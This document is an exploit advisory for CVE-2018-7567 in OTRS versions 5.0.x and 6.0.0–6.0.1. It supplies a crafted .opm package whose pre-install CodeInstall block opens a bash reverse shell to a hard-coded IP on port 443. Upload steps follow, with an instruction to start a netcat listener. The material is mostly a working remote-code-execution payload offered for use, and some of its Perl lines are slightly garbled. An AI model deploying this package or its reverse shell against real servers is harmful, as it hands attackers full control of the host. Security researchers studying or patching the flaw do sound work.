# Exploit Title: OTRS Authenticated file upload
# Date: 03-03-2018
# Exploit Author: Ali BawazeEer
# Vendor Homepage: https://www.otrs.com/
# Software Link: http://ftp.otrs.org/pub/otrs/
# Version:5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1
# Tested on: OTRS 5.0.2/CentOS 7.2.1511
# CVE : CVE-2018-7567
# Vulnerability Description:
authenticated admins are able to exploit a Blind Remote Code Execution vulnerability by loading a crafted malicious opm file with an embedded codeinstall tag to execute a command on the server during package installation.
aC/ Proof opm file to upload
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
<BuildDate>2016-09-23 11:17:41</BuildDate>
<BuildHost>opms.otrs.com</BuildHost>
<Framework>5.0.x</Framework>
<IntroInstall Lang="en" Title="My Module" type="pre">
<br>
Hello wolrd
<br>
((Hello!))
<br>
</IntroInstall>
<CodeInstall type="pre">
print qx(bash -i >& /dev/tcp/192.168.56.102/443 0>&1 &);
</CodeInstall>
<CodeInstall Type="post">
# create the package name
my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};
$Kernel::OM->Get($ModeModule)-%gt;CodeInstall();
</CodeInstall>
<CodeUninstall type="pre">
my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content};
$Kernel::OM->Get($CodeModule)->CodeUninstall();
</CodeUninstall>
</otrs_package>
- Steps:
- Go to package manager from administrator panel
- Save the above code in opm file and upload it as package
- change the ip address to your attacking machine and setup netcat listener
# =================================================EOF =======================================================
#
#
# Risk : attackers are able to gain full access to the server after uploading malicious opm file
# and thus have total control over the web server ,
#
# Vulnerability Limitation : Admin access needed to escalate the privilege from application level to control the server
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer